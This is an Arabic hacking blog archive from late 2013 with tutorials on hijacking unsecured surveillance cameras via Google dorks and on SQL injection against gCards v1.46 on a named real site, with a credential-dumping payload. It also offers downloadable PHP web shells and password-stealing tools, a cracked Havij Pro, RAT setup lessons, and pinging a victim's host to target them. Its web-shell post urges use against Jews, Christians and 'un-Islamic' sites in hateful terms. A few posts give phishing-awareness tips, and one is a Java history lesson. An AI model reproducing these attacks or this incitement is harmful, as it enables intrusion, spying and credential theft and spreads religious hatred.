جميع ما تحتاجه من برامج الهكر

جميع البرامج تم فحصها من تلغيم وديدان وغيره ... جميع البرامج تم رفعها علي موقع mediafire يفضله الجميع جميع البرامج تم رفعها من رفعي الشخص

امنع الهاكر من التجسس عليك بقفل باب port مفتوح في ...

منع الهاكر من التجسس بقفل احد الابواب المفتوحة في الجهاز كما يقول المثل شد الباب الذي يأتيك منه الريح واستريح

ماذا يجري على الإنترنت كل 60 ثانية ؟

نعلم جميعاً أن مجريات الأمور تتحرك بسرعة على شبكة الإنترنت، في دقيقة واحدة فقط، يُمكن لأحدكم القيام بقراءة وكتابة بعض التغريدات، أو مشاهدة ثلاثة مواقع مفضلة لديه مع الرد على رسالة بريد إلكتروني من رئيسه في العمل، هذا لشخص واحد، فما بالكم بمستخدمي الإنترنت في العالم أجمع؟

ختراق الفيس بوك تويتر وغيرها عن طريق الباك تراك 5

السلام عليكم ورحمة الله وبركاته شرحنا اليوم عباره عن اختراق الفيس بوك تويتر وغيرها عن طريق الباك تراك 5

شرح برنامج يفيد الأشخاص المهتمين باختراق المواقع

برنامج أكثرمن رائع قد يهم أكثر الأشخاص الذين هم مهتمين بعالم اختراق المواقع ، كما قد يهم الأشخاص الذين يبحثون عن معلومات المواقع عبر الأنترنت ، حيث يزودك البرنامج بمجموعة كبيرة من المعلومات حول الموقع بما فيه رقم الهاتف الخاص بجهة الإتصال ، وأيضا يعطيك رقم الأيبي و عنوان الموقع إلى غير ذلك من الأشياء التي تود البحث عنها في أي موقع تريده


مواضيع هامة !!

mardi 31 décembre 2013

اخترق وتحكم في كاميرات المراقبه

ثغرة ممتعة جدا تمكنك من مشاهدة كاميرات

المراقبة التى توضع فى المنازل ويمكنك ايضا التحكم بالكاميرا .

واسال الله ان تفيد الجميع . .

شرح الثغرة :
اذهب الى جوجل. . <http://www.google.com> واكتب فى محرك البحث

هذه ثغرات المشاهده. .

inurl:"MultiCameraFrame?Mode="

inurl:"ViewerFrame?Mode="

inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode="
inurl:"axis-cgi/mjpg"
وهذه ثغرات المشاهده بالتحكم
ادخل الي محرك بحث جوجل واكتب
LiveApplet
هتظهر لك مواقع بنفس الاسم كلها هكذا

LiveApplet
LiveApplet
LiveApplet
LiveApplet
LiveApplet
ادخل على اى موقع فيهم وانتظر التحميل وستجد امامك الكاميرا

وشوف المفأجاة . .
سبب الثغرة هى ان بعض شركات المراقبة تقوم بوضع كاميرات موصولة

بالانترنت وهذة الشركات لاتلتفت للجانب الامنى لذلك يمكن الوصول اليها عبر

محركات البحث او شركات تقديم خدمة المراقبة . .

وهذة الكاميرات تحتاج ( جافا ) حتى تعمل


lundi 30 décembre 2013

ثغرة sql سهلة للجميع


 ثغرة sql سهلة للجميع

السـلام عليكم ورحمـة الله وبركاته

كيف حالكم شباب عساكم بخير ان شاءالله

عندي درس عن لاختراق باستخدام ثغرات SQL

السكربت الي عندنا يحتوي على ثغرة اسمة gCards v1.46

طريقة البحث عن السكربت اذهب الي google

واكتب الدورك :
Powered by gCards v1.46


المواقع كثيـره مصاابـه زي مآأنتم شاايفين الحين انا بطبق على موقع عندي
ستخرج لك مواقع كثيرة مصابة

أخترنا منها هذا الموقع :
http://www.feve.de


اما طريقة الاستغلال جاهزة مجرد تربطة بالرابط
هذا هو رابط الاستغلال:.


getnewsitem.php?newsid=1+union+select+1,2,concat(u ser****,0x3a3a,userpass),4,5+from+gc_cardusers


نضيفة بعد السكربت

لاحظ معي

الحين نروح فك الباسورد المشفر .. تابع معي مبروك انت كذا طلعت الادمن والباسورد تابع معي

http://md5.rednoize.com
 
 

vendredi 27 décembre 2013

نصائح ضرورية جداً لمبتدئي الهكر.

السلام عليكم و رحمة الله و بركاته
اهلين بأعضاء احلا منتدى
اليوم عندي نصائح ضرورية جداً لمبتدئي الهكر

1_تعلم دائماً أن لا تثق بهكر:فيمكن أن يقول لك أتريد برنامج تضع الايميل يوصلك الباسورد...بشكل طبيعي سوف تنفعل و توافق ثم يقوم بإرسال برنامج لا يعمل و يكون فد دمج به فيروس أو سيرفر(باتش)...ما هو السيرفر(الباتش)؟
السيرفر(الباتش):هو ملف امتداده(exe.)عندما يتم فتحه يستطيع من قام بتكوينه الدخول إلى الكومبيوتر الذي فُتح منه السيرفر(الباتش)و سحب جميع الباسوردات الموجودة فيه.


2_احمي جهازك بمضاد الفيروسات(Anti Virus)لأن من قام بتكوين السيرفر(الباتش) إن لم يكن محترف فلن يشفر السيرفر(الباتش)....ما هوالتشفير؟
التشفير:هو منع بمضادات الفيروسات(Anti Virus)من رؤية السيرفر(الباتش) أو الفيروسات كفيروس لأن بشكل طبيعي يعتبر السيرفر(الباتش) فيروس فالتشفير يمنع بمضادات الفيروسات(Anti Virus)من رؤية السيرفر(الباتش) كفيروس.

3_إذا أعطاك أحدٌ لا تعرفه موقع و قال لك سجل دخولك لتربح...فلا تسجل دخولكفقد تكون صفحة مزورة.ما هي الصفحة المزورة؟
الصفحة المزورة:هي صفحة ك لما يكتب فيها يرسل لمصممها(كلمة المرور+الايميل).

4_إذا أعطاك أحدٌ لا تعرفه موقع فلا تدخل اليه فقد يكون ملغم إيضاً(مدموج به سيرفر).

5_إذا وصلتك رسالة لا تعرف مرسلها فلا تفتحها فقد تكون ملغمة إيضاً(مدموجة سيرفر).

6_عند تنزيل أي شيء من النت يفضل فحصه بإحد الروابط التي تفحص بجميع مضادات الفيروسات(Anti Virus).

mardi 24 décembre 2013

شرح استخراج Ip المستهدف بُ اسهل طريقه ُ..

صبآح الخير آن كآن صبآحآ ومسسآء الخير آن كآن مسسآءآ .ُ.
كيف الححُآل حبآيبي آن شاء الله تمام ُ. .

آليوم بأذن الله سيتم شرح ُ
طريقه احتمآل تكون معروفه عند بُعض آلآششخآصص ُ..
ولاكن الطريقه جميله جدآ للُأستهدآف الخخآرجيٌ
لبعض الملغمين او المستهدفين ُ. .
طبعآ الطريقه هي ُ .
1 - لازم يكون عندك اآسم نو اي بي المراد استهدآفهه ُ. .
2 - تكون عندك خخبره بُ الاستهدآف الخآرججي ُ. .
I-----------------------I
الطريقه تتكلم عنُ
( انك تفتح الدوس وتضع نو آي بي الملغم وسيظهر لكُ Ip صآحب الههوست ُ.. )
طبعآ الطريقه تتكلم عن ارسال هجومات للنو آي بي + اظهار اي بي صآحب الههوست ُ..ُ
I-----------------------I
بُسم الله نبدآ ششرح ُ
اول شى نفتح الدوس ٌُ. .



ثم يفتح لنا آلدوس ُ..
نقوم بكتآبه هذا الامر ُ. .
( Ping -t ******.no-ip.biz )

طبعآ مكان ( **** ) نقوم بكتآبه الهوست المراد

الهجوم آليه أو المراد معرفه الاي بي تبع الشخص للذي يستخدم هذا الهوست .ُ.

طبعا واذا عرفت الاي بي تبعه تقدر تحدد موقعه او استهدافه او ارسال هجومات الي جهازه بُ البآك وغيرهآ ُ. .

تآبع :~

يجب وضع النو اي بي هكذآ .ُ.


بعدها نقوم بٌُ الظغط على زر ( EnTeR )

وسيظهر لنآ Ip صآححب الهوست + الهجوم ععُ الههوست ُ. .


مثُل مُ انتوآ شآيفين الآي بي اللي بُ اللون الاحممر ُ..

هو آي بي صآحب آللهوست ُ..~
صوره رقم 1
صوره رقم 2



صوره رقم 3



آنتهى ُ.

I-----------------------------------------------I
تم بحمدالله شرح الدرس ُ..

وان شاء الله كان بسيط الدرس ُ. .

ومو ممل :$

وان شاء الله نراكم لآحقآ ُ..

ارجوا الدععآء لٌي بُ التوفيق ..

الله يوفق الجميع ان شاء لله ُ..

فمان الله ُ..

 

lundi 23 décembre 2013

جميع أنواع سكريبت php الحديثه للتحميل + ومميزاتها



السلام عليكم ورحمة الله وبركاته

حياكم الله أحبتي في الله

إليكم أخواني في الله إسكربتات الشل الحديثة

مع شرح مختصر عن أهم مميزات كلاُ منها


وأرجــــو ألا تستخدم إلا فيما يرضي الله ورسوله


وذلك ضد المغضوب عليهم ( اليهود الملاعيين أحفاد القردة والخنازير)

أو الضالين ( النصاري )

أو المواقع المخالفه للشريعه

=====================

بسم الله الرحمن الرحيم نبدأ



====================================

c99.phpl

الوصف ..

شل روسي جميل جدا ومن خصائصه الاتصال بقاعده البيانات
والتنقل بين المجلدات والكثير من الخصائص اكتشفها بنفسك ..




====================================

r57.php

الوصف ..

شل روسي جميل جدا ومن خصائصه التنقل بين المجلدات بكل سهوله
واظهار صلاحياتك علي السيرفر ومعلومات عن السيرفر من اصدار كيرنل .. إلخ وايضا رفع ملف الي الموقع عن طريق upload
بكل سهوله والاتصال بقاعده البيانات وايضا يوجد فيه باكدور والكثير ..



====================================

Nstview

الوصف ..

شل حديث وتقريبا نفس الشل الروسي r57 من رفع ملف وتعديل .. إلخ
يعني فرق بسيط بينهم والكثير من الخصائص اكتشفها بنفسك ..




====================================

Phpspy

الوصف ..

شل جميل ومن خصائصه انشاء مجلد جديد
والاتصال بقاعده البيانات يعني نفس الشل الروسي
وجميع هالشلات الفرق بينهم بسيط واكتشف الخاصيات بنفسك




جميع السكربتات بالمرفقات
====================================



وبالتوفي
الملفات المرفقة
نوع الملف: zip ch99.zip‏
نوع الملف: zip nstview.zip‏
نوع الملف: zip phpspy.zip‏
نوع الملف: zip r57.zip‏

samedi 21 décembre 2013

كل ادوات استخراج كلمات السر هنــــا

بسم الله الرحمن الرحيم

الاوات هي كتالي
استخراج باس المتصفحات

opera
firefox
google chrome
internet explo

اداة استخراج الار دي بي
اداة استخراج الفي ان سي vnc

استخراج باس الحسابات التالية

MSN PASSWORD
facebook
yahoo
twitter
IMPassword
Mailpv
MSN PASSWORD
NET PASS<< كل المواقع المخزنة على كل المتصفحات
wirelesskey

والكتير من الادوات
طريقة التشغيل بسيطة بس نصب الادوات وراح تفهم طريقة تشغيلها
ملاحظة الادوات تستخرج الباسوردات اللي في الجهاز
يعني لو في جهاز احد اصدقائك وا كذا ....

لتحميل الادوات من حبيب الملايين ميديافاير
http://www.mediafire.com/?c3al8n8rxfn2elx

في امان الله

jeudi 12 décembre 2013

Havij Pro V1.17

#~السلام عليكم ورحمة الله وبركاته~#



برنامج الهافيج الغني عن التعريف : Havij

لاستغلال ثغرات الـ SQL بانواعها

اليوم معنا النسخة الاخيره مع الكراك

طبعا فيه نسخ مكركة ولاكن ليست كامله

لاتوجد فيها خاصية تخطي المود سيكورتي وغيرها

وجبت النسخة الكاملة والكامل وجه الله مع الكراك والمفتاح

طبعا الكراك او الباتش عند الانتي فايرس يعتبر فايرس

وتم فحص البرنامج والكراك من التلغيم والحمدلله نضيف

طيب نجي لطريقة التشغيل :

اول شي نثبت البرنامج وبعد التثبيت اذهب للمسار :
كود PHP:
C:\Program Files\ITSecTeam\Havij Pro  
وضع الكراك بالمجلد اعلاه ^

اللي اسمه : 
كود PHP:
Loader.e x e  
الحين نفتح الكراك ~ Loader.e x e

تابع الصوره :



بعد تشغيل الكراك :




بخانة الـ Nam e تضع اي اسم

وبخانة الـ File تضع المفتاح : HavijKey.lic

ومن ثم تضغط على : Register

كذا تم التشغيل بنجاح :



كذا خلصنا انتهينى الحين عند تشغيل البرنامج يتم تشغيل الكراك

ووضع اي اسم وملف المفتاح ومن ثم تسجيل وخلاص مبروك عليك



نجي لتحميل البرنامج + الكراك + المفتاح :

http://www.mediafire.com/download/70...+Pro+V1.17.zip


تحياتي

mardi 5 novembre 2013

[ الدرس الثانى ] شرح عمل حساب بموقع no-ip + تثبيت البرنامج






شرح عمل حساب NO-IP

ندخل موقع النو ايبى من هنا


ونتابع الشرح بالصور








































..

حملنا البرنامج ناتى لتفعيلة وتشغيلة

تابع







مبروك عمل الحساب

..
رابط مباشر لبرنامج النو ايبى من الموقع الرسمى لمستخدمى الويندوز



.......

رابط اخر للبرنامج لكل من يشتكى من رابط الموقع

حمل من ميديا فير

ديف بوينت

.....

لتحميل جميع الصور فى ملف واحد


.......


اى عضو تواجهه مشاكل فى فتح موقع no-ip

يستخدم كاسر بروكسى لفك حجب الموقع [ وما اكثرها فى قسم البرامج ]

اتمنى ان يكون الشرح واضح ومفهوم

dimanche 3 novembre 2013

تعرف على6طرق يستطيع الهاكر من خلالها سرقة باسورد حساباتك


1 -#لصفحات_المزورة_Phishing :-

من الطرق الاكثر إنتشارا هي سرقة الباسوردات عن طريق الصفحات المزورة او Phishing فماهو الفيشينج ؟ الــ Phishing هي عبارة عن صفحات مزورة تكون شبيهة بصفحات المواقع الرسمية (المواقع التي تزورها ) هذه الصفحات تكون في إستضافات (مساحات ) يمتلكها الهاكر وعندما تدخل على تلك الصفحة المزورة وتدخل الباسورد فإن الباسورد سيرسل إلى الهاكر وهكذا سيحصل هذا الاخير على باسوردك . وطريقة إقناعك بالدخول على الصفحة المزورة قد تخلف من هاكر إلى هاكر فهناك البعض سيراسلونك بإيميل على علبة الواردات منتحلين شخصية الموقع المسجل به يطلبون منك تغير باسورد حسابك وبعد ان تنقر على الرابط يتم توجيهك إلى الصفحة المزورة عوض ان تتوجه إلى صفحة الموقع الحقيقي لهذا إنتبه دائما إلى عنوان الموقع وتأكد من انه حقيقي قبل وضع الباسورد في اي صفحة.

2-#الشم_Sniffing :-

وهذه الطريقة يتبعها الهاكر في حالة كنت معه في نفس الشبكة مثلا كنت متصلا بالانترنت من خلال مقهى انترنت بإستعمال حاسوبك او في العمل او المدرسة حيث ان الجميع مرتبط بنفس الشبكة فيقوم الهاكر بإستعمال بعض البرامج او الادوات من اجل سرقة اي باسورد تدخله في الموقع حيث ان الباسورد يصبح يمر من حاسوبه قبل ان يمر إلى سرفر الموقع وهكذا يستطيع قرائته من دون مشاكل ولحماية نفسك قم دائما بتجول المواقع بإستعمال بروتوكول https مثلا لاتتصفح الفيسبوك إلا بعد ادخال https://facebook.com/ عوض http://facebook.com/

3-#الهندسة_الإجتماعية :-

قد يستعمل الهاكر اسلوب الهندسة الإجتماعية من اجل معرفة الباسورد فهو يحاول ان يجمع كافة المعلومات عنك من اجل التعرف على الباسوردات الممكنة بل كذلك من اجل سرقة الحساب عن طريق الإجابة على السؤال السري للحساب لهذا حاول دائما ان تكون الباسوردات التي تختارها لحساباتك ليست لها علاقة مع حياتك الخاصة او العملية كذلك بالنسبة لـإختيارك لسؤال الامان في حسابك فلا تختار إجابة صحية للسؤال مثلا لو إخترت السؤال في اي سنة ولدت جدتك ؟ إختر الجواب ان يكون "ساعة يدوية " هكذا لن يستطيع الهاكر إختراق حسابك إنطلاقا من تقديم جواب صحيح للسؤال . في حالة طلب منه لان الإجابة التي إخترتها انت لحساب ليست لها علاقة مع الجواب الحقيقي .

4-#إختراق_قواعد_بيانات_المواقع :-

قد يقوم الهاكرز بإختراق قواعد بيانات لبعض المواقع الشهيرة والتي تحتوي على الاف البيانات قد يكون منها إيميل وباسورد تسجيل الدخول الذي تستعمله لهذا قد يستعملوا تلك البيانات في تجربة الدخول على حساباتك الاخرى في الانترنت لهذا لاتجعل ابدا الباسورد الذي تسجل به الدخول في المواقع و المنتديات هو نفسه الذي تستخدم في تسجيل الدخول إلى إيميلك .

5-#التخمين_brute_forcing :-

في حالة إذا كنت لاتغير الباسورد من وقت لاخر قد تكون ضحية تخمين الباسورد وهي عملية يستند فيها الهاكر إلى برامج وكذلك إلى اجهزة تقوم بعملية تخمين باسورد حسابك عبر تجربة الاف الإحتماليات في الثانية الواحدة ، لهذا قبم بتغير الباسورد من وقت لاخر .

6-#إستعمال_برامج_ضارة :-

ومن الطرق المعروفة وهي إستخدام تروجانات وبرامج ضارة في سرقة الحساب ، حيث ان الهاكر قد يرسل إليك تروجان وهو عبارة عن ملف تجسس يمكن الهاكر من الدخول إلى الحاسوب والتجسس عليه ، تم لتجسس على كافة الباسوردات التي تدخلها إلى حاسوبك وهكذا يستطيع إختراقك ، لهذا لاتدخل إلى اي رابط انت غير متأكد منه ولاتحمل اي شيئ من على الانترنت إلا بعد التأكد من مصدره .
تحذير لا أحد يحمل برامج تسمى إختراق الفيس بوك فإنها
ملفات تجسس وهي كذب في كذب
وفي الختام ارجوا ان تكون المعلومة وصلت وكل شخص يستطيع حماية نفسه ^_*

samedi 2 novembre 2013

[ الدرس الاول ] مقدمة في اختراق الاجهزة عن طريق برامج الاختراق

 
 مقدمة في اختراق الاجهزه عن طريقة برامج الاختراق
  
يعتمد مخترقين الاجهزه عن طريق برامج الاختراق علي فتح جهه اتصال مابين جهاز الضحية وجهاز المخترق
حيث يقوم المخترق بتثبيت باتش [server] وتشغيله علي جهاز الضحية عن طريق احد الثغرات او الدمج او التلغيم مما يقوم بارسال معلومات الاتصال بواسطه الاتصال العكسي عن طريق الأي بي [IP] إلي الجهاز الخاص بالمخترق حتي يتلقاها البرنامج ويقوم بالاتصال بجهاز الضحية مباشرة عن طريق احد البورتات [ المنافذ ] المتاحه والمحدده بواسطه المخترق وتسمي هذه العمليه بالتبليغ

الضحية : الجهاز الذي يعمل به الباتش والمتحكم بواسطه المخترق

برنامج الإختراق : برنامج يقوم بصنع باتش [ خادم ] والتحكم في نظام التشغيل الخاص بالجهاز المصاب بالخادم

الباتش [ Server ] : او مايسمي بـ [الخادم] ملف يصنع بواسطه برامج الاختراق يحمل معلومات الاتصال بالبرنامج حيث يعمل علي استخدام احد المنافذ المتاحه للإتصال ببرنامج الاختراق وتزويده بمعلومات الاتصال بالجهاز الضحيه للتحكم به

الإتصال العكسي : هو نقل المعلومات [ البيانات ] من جهاز لاخر مباشره عن طريق الاي بي

الأي بي [IP]: عنوان الجهاز علي شبكه الانترنت وهو رقم علي النحو التالي xxx.xxx.xxx.xxx يتغير بطريقة ديناميكية

البورت [ Port منفذ ] : منفذ في لوحه التحكم الخاصه بإتصال الجهاز بالانترنت يتيح تبادل المعلومات من خلاله

التبليغ : وهو وصول المعلومات الخاصه بجهاز الضحيه إلي جهاز المخترق حتي يقوم بالإتصال به
 
الثغره [Exploit] : وهي خطأ برمجي يستخدمه المخترق في الوصول لمبتغاه

الدمج [ Bind ] : هو دمج ملفين او اكثر داخل ملف واحد هذا الملف يقوم بنسخ هذه الملفات الي داخل الجهاز بطريقة مخفيه ثم يقوم بتشغيلها بعد عمليه النسخ

التلغيم : هو اصابه ملف بالباتش في حاله تشغيل تلك الملف يقوم بتشغيل الباتش كأنه احد ملفاته

jeudi 31 octobre 2013

الدرس 01: مقدمة حول الجافا

http://i.imgur.com/zfjp6.png

السلام عليكم اخواني اخواتي أعضاء وزوار منتدى لغات البرمجة
درس اليوم سيكون تعريفاً بسيطاً لتاريخ الجافا وتطورها، نرجو أن يفيدكم الدرس ولو بالشيء القليل.


تاريخ تطور الجافا:
لفهم الجافا كلياً يجب أن نفهم الأسباب وراء اخترعها ، القوات التي شكلتها والإرث الذي ورثته. مثل اللغات البرمجية الناجحة التي أتت قبلها، جافا هي
مزيج من أحسن عناصر تراثها الغني مدموج مع المفاهيم المبتكرة اللازمة لمهمتها الفريدة.
مع أن الجافا باتت مرتبطةً بصورة لاانفصام لها مع الإنترنت والبيئة الإلكترونية للأنترنت، فإنه مهم جداً تذكر أن الجافا هي أولا وقبل كل شيء لغة برمجة.
إن تطور لغة برمجة ما وابتكارها يحدث لسببين رئيسيين هما:
  • التأقلم مع التغير البيئي والاستعمالي.
  • القيام بتحسين وتطوير فن البرمجة.
نسب الجافا:
جافا قريب ال ++C ، الذي هو منحدر مباشرةً من C. الكثير من صفة الجافا موروث من هاتين اللغتين. من ال C تستمد جافا تركيبتها اللغوية والكثير من

 خصائص التوجه الكائني مستمد من ++C.
في الواقع الكثير من الخصائص المميزة للجافا أتت من -أو هي ردود- لاسلافها، من ناحية أخرى إختراع الجافا متجذر من عملية التحسين والتأقلم التي كانت
 تحدث في لغات البرمجة في العشريات الأخيرة.
كما تعلمون كل إبتكار أو إبداع في تصميم لغة برمجة كان مدفوع لضرورة حل مشكل أساسي لم تستطيع حلها اللغات السابقة.وجافا بدون إستثناء.


إختراع الجافا:
جافا اخترعت من طرف جيمس جوسلينج (James Gosling)، باتريك نوغتن (Patrick Naughton)، كريس وارث (Chris Warth)، إد فرانك

 (Ed Frank) و مايك شريدان (Mike Sherida)في شركة سن مكرسيستمس (Sun Microsytems inc) عام 1991, حيث أخذت منهم 18 شهراً
 لتطوير أول نسخة ناجحة سميت أوك "Oak"، أعيد تسميتها جافا "Java" في 1995. بين أول تطبيق لأوك "Oak" في خريف 1992 إلى الإعلان العام
عن جافا في ربيع 1995, شارك الكثير في تصميم اللغة. من بينهم بيل جوي (Bill Joy)، أرثر فان هوف (Arthur Van Hoff) واخرون كانوا المساهمين
 الأساسيين للنموذج الأصلي.

جيمس جوسلينج (James Gosling)
والغريب بعض الشيء أن الدافع الأصلي لم يكن الأنترنت، ولكن الدافع الأولي كان الحاجة إلى لغة برمجة ذات منصة مستقلة (Platform-Independent)

و ذات هندسة محايدة (architecture-neutral) تمكن من إنجاز برامج يمكن دمجها في العديد من الأجهزة الإلكترونية مثل أجهزة المايكرويف وأجهزة
 التحكم عن بعد.
كما تعلمون العديد من البروسيسورات تستخدم للتحكم في الأجهزة،كان المشكل مع C و ++C ومعضم اللغات الأخرى أنها مصممة للترجمة إلى هدف معين،
مع أنه يمكن ترجمة برامج ++C لأي نوع بروسيسور لعمل هذا يستلزم كومبايلر (Compiler)كامل يستهدف هذا النوع من البروسيسور، والمشكل يكمن
في أن الكومبايلر مكلف ويأخذ وقت كبير للإنجاز، وهنا كانت الحاجة لحل سهل وغير مكلف.
لمحاولة إيجاد مثل هذا الحل بدأ Gosling والأخرين بالعمل على لغة محمولة وذات منصة مستقلة والتي يمكن استعمالها لإنشاء كود بإمكانه العمل على العديد
 من البروسيسورات تحت بيئات مختلفة وهذا الجهد قاد إلى إختراع الجافا.
ولكن في نفس الوقت الذي كانت تفاصيل الجافا بدأت تنشأ ضهر عامل أخر وأكثر أهمية لعبة دوراً هاماً في مستقبل الجافا هذا العامل كان الأنترنت بالطبع،
 لو لم تظهر الأنترنت في نفس الوقت الذي بدأت الجافا تطبق وتطور ربما لبقيت الجافا لغة برمجة نافعة ولكن غامضة تستعمل في برمجة الأجهزة الإلكترونية.
لكن مع ضهور الأنترنت دفعت الجافا إلى مقدمة لغات البرمجة لأن الأنترنت أيضاً تطلبت برامج محمولة.

كيف غيرت جافا الأنترنت ؟

ساعدت الأنترنت على قذف الجافا إلى المراتب الأولى للغات البرمجة وبالمقابل كان للجافا تأثير عميق على الأنترنت زيادة على ذلك تسهيل برمجة المواقع عامة،
 جافا طورت نوع جديد من برامج الشبكة والتي سميت الواجهات (Applets). جافا تناولت أيضاً بعض القضايا الشائكة الخاصة بالأنترنت ألا وهي الحمولية
 والأمن.

سحر الجافا: البايت كود (Bytecode)
المفتاح الرئيسي الذي مكن الجافا من حل مشكل الحمولية والأمن هو أن ناتج كومبايلر الجافا ليس كود قابلاً للتنفيذ (exe) بل هو بايت كود.
البايت كود هو تعليمات مطورة بشكل عالي مصممة للتنفيذ من طرف الألة الإفتراضية للجافا (Java Virtual Machine)، ال JVM الأصلي صمم كمترجم
 للبايت كود.
هذا مفاجئ قليلاً لأن الكثير من لغات البرمجة المعاصرة مصممة لتحويل الكود إلى كود تنفيذي للحصول على جودة أداء عالية ولكن في حقيقة الأمر تنفيذ برامج
 الجافا من طرف JVM ساعد على حل مشاكل عويصة خاصة ببرامج الأنترنت. وهاهو السبب لماذا ...
ترجمة برنامج جافا إلى بايت كود تساعد كثيراً سهولة عمل البرنامج في العديد والكثير من البيئات المختلفة لأنه يجب تنفيذ أو تطبيق ال-JVM فقط على كل
 منصة أو نظام، لا يجب أن ننسى أن JVM سيختلف من نظام إلى أخر أو منصة إلى أخرى ولكن كلهم يفهمون نفس الجافا بايت كود.
خصائص الجافا:
لن يكتمل النقاش حول تاريخ الجافا بدون إلقاء نظرة على بعض الكلمات التي أدت إلى تطويرها، مع العلم أن القوتين الرئيسيتين اللتين ادتا إلى إختراع الجافا
 كانت الحمولية والأمن إلا أنه كان هناك عوامل أخرى لخصها فريق الجافا في ما يلي:
  • البساطة
  • الأمن
  • الحمولية
  • التوجه الكائني
  • القوة
  • الهندسة المحايدة
  • الترجمة
  • الأداء العالي
  • التوزيع
  • الديناميكية



إلى هنا اخواني اخواتي ينتهي درس اليوم المتعلق بتاريخ الجافا، شكرا لكم على المتابعة وأرجو من الله عز وجل أن نكون قد وفقنا ولو قليلاً في هذا الموضوع.

إلى درس أخر إن شاء الله, تابعونا
والسلام عليكم ورحمة الله تعالى وبركاته